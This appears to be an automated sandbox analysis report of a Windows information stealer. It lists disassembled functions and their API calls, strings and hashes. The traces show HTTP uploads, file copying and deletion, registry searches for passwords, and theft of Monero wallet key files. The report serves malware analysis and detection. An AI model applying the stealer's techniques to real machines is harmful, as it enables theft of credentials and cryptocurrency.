Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,04370BC0), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,04370BA0,00000000,?,043781D8,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04370AE0,?,04378A80,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

", xrefs: 00405985
------, xrefs: 004058BB
------, xrefs: 00405746
J&f, xrefs: 00405878
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
-A, xrefs: 00405620, 00405D27, 00405623
------, xrefs: 004059FC
", xrefs: 00405AC6

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 973b8a43593daf1daacf6c7f5fe3cc353c6d700f755c7d0dae3ca370f4ba0e22
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 973b8a43593daf1daacf6c7f5fe3cc353c6d700f755c7d0dae3ca370f4ba0e22
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0436D980,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 4724f57c80c5ccb517ebe5cb1bf81a9d293302537db6e20a181496a60ca8227d
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: 4724f57c80c5ccb517ebe5cb1bf81a9d293302537db6e20a181496a60ca8227d
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04378208,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0436D980,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: c8164160b88f97020f9c5aff05177b0a5368b1f620fec4bba8d6403bb6f38b9b
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: c8164160b88f97020f9c5aff05177b0a5368b1f620fec4bba8d6403bb6f38b9b
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,04370BC0), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04370B40), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04370AE0,?,04378A80,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

------, xrefs: 004047E8
", xrefs: 004049F3
J&f, xrefs: 004047A5
------, xrefs: 00404929
------, xrefs: 0040467D
", xrefs: 004048B2

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: f878f56f84ba45d93086740d51afd7e7722ca98a989a2cce51332dd5e7a994cd
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: f878f56f84ba45d93086740d51afd7e7722ca98a989a2cce51332dd5e7a994cd
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,04373798,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 5006b39ac59f030e58fb0d02e9c357e1868f6499d590eaa67df8c9110744e5f6
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: 5006b39ac59f030e58fb0d02e9c357e1868f6499d590eaa67df8c9110744e5f6
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0436D980,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04378208,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Strings

.keys, xrefs: 0040132B
wallet_path, xrefs: 004012F0
\Monero\wallet.keys, xrefs: 0040134D
SOFTWARE\monero-project\monero-core, xrefs: 004012F5

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 33848626fbaf5211245e59cc062cba06af5fe8c0e6f0d2c77249055f748380b4
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 33848626fbaf5211245e59cc062cba06af5fe8c0e6f0d2c77249055f748380b4
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(308C9020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(308C9020,00000000), ref: 00407018
lstrcat.KERNEL32(308C9020, : ), ref: 0040702A
lstrcat.KERNEL32(308C9020,00000000), ref: 0040705F
lstrcat.KERNEL32(308C9020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(308C9020,00000000), ref: 004070A3
lstrcat.KERNEL32(308C9020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
: , xrefs: 0040701E
h0A, xrefs: 00406FA6, 00406FA9

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
